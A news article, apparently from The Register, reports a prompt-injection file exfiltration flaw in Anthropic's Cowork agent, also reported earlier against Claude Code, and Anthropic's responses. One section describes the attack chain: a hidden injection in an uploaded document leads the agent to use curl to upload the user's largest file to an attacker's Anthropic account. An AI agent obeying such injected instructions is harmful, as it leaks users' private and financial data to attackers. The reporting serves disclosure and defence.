Contagious Claude Code bug Anthropic ignored promptly spreads to Cowork

Office workers without AI experience warned to watch for prompt injection attacks - good luck with that

by · The Register

Anthropic's tendency to wave off prompt-injection risks is rearing its head in the company's new Cowork productivity AI, which suffers from a Files API exfiltration attack chain first disclosed last October and acknowledged but not fixed by Anthropic.

PromptArmor, a security firm specializing in the discovery of AI vulnerabilities, reported on Wednesday that Cowork can be tricked via prompt injection into transmitting sensitive files to an attacker's Anthropic account, without any additional user approval once access has been granted.

The process is relatively simple and, as PromptArmor explains, part of an “ever-growing” attack surface - a risk amplified by Cowork being pitched at non-developer users who may not think twice about which files and folders they connect to an AI agent.

Cowork, launched in research preview on Monday, is designed to automate office work by scanning files such as spreadsheets and other everyday documents that desk workers interact with daily.

In order to trigger the attack, all a potential victim needs to do is connect Cowork to a local folder containing sensitive information, upload a document containing a hidden prompt injection, and voilà - when Cowork analyzes those files, the injected prompt triggers. 

PromptArmor's proof of concept used a curl command to Anthropic's file upload API, asking it to upload the largest available file to the attacker's API key, making that file available to the attacker through their own Anthropic account. PromptArmor demonstrated this with a real estate file, which the simulated attacker was then able to query via Claude to retrieve financial information and PII of individuals mentioned in the document.

The flaw follows the same basic Files API exfiltration playbook that security researcher Johann Rehberger reported to Anthropic back in October concerning Claude Code. Rehberger received a rather lukewarm response from Anthropic at the time - it first closed his bug report before admitting that it's possible to use a prompt injection attack to trick its API into exfiltrating data so users ought to just be careful with what they connect to the bot. 

We asked in October whether Anthropic would consider doing something as simple as, say, implementing an API check to be sure files weren't being transmitted to a different account via the API, but Anthropic didn't respond. 

Anthropic's response to the issue arising in Cowork seems to be a similar this-is-on-you-so-be-careful one, with the company noting in its Cowork announcement that prompt injection attacks are an issue. 

"We've built sophisticated defenses against prompt injections, but agent safety—that is, the task of securing Claude's real-world actions—is still an active area of development in the industry," Anthropic said. 

"These risks aren't new with Cowork, but it might be the first time you're using a more advanced tool that moves beyond a simple conversation," the company continued, as Cowork is an agentic tool with a much wider user scope than its previous tools. 

To mitigate these risks, Anthropic warns Cowork users to avoid connecting Cowork to sensitive documents, limiting its Chrome extension to trusted sites, and monitoring it for "suspicious actions that may indicate prompt injection." 

As developer and prompt injection worrier Simon Willison opined in his hands-on review of Cowork, that's a big ask from people not familiar with the intricacies of AI. 

"I do not think it is fair to tell regular non-programmer users to watch out for 'suspicious actions that may indicate prompt injection,'" Willison said. 

Once is an accident, twice is a coincidence …

This isn't the first time Anthropic has argued a reported flaw wouldn't be patched.

Back in June 2025, Trend Micro disclosed that Anthropic's open-source reference SQLite MCP server implementation for connecting to external data sources contained a classic SQL injection flaw. Anthropic said the issue was out of scope because the GitHub repository containing the affected code had been archived in May 2025, and no patch was planned.

Unfortunately, that SQLite MCP server had already been forked or copied more than 5,000 times before it was archived, meaning the vulnerable code may still be circulating across a large number of downstream projects.

Anthropic told us in June that it disagreed with Trend Micro's analysis of the issue, and rather than shipping a fix for the archived code, pointed users to the MCP specification's guidance that a human should be watching and approving what the tool does.

"The MCP specification recommends human oversight for this type of tool – there should always be a human in the loop with the ability to deny tool invocations, meaning users would review these queries before execution," an Anthropic spokesperson told us last summer. 

PromptArmor's report might hinge on the same problem that Rehberger reported last year, but its language around prompt injection again shows Anthropic framing the risk as something users are expected to manage.

When asked what it was doing to address the API prompt injection issue, now present in two products, Anthropic told The Register that prompt injection is an industry-wide issue that everyone in the AI space is trying to solve. 

That said, an Anthropic spokesperson claimed that it's also working on ways to minimize prompt injections in its products, including by using a virtual machine in Cowork that is designed to minimize the platform's access to sensitive files and directories. Anthropic told us it plans to ship an update to the Cowork VM to improve its interaction with the vulnerable API today and that other security improvements will be forthcoming. 

Anthropic also stressed that Cowork was being released as a research preview, and invited users to send feedback or security recommendations. ®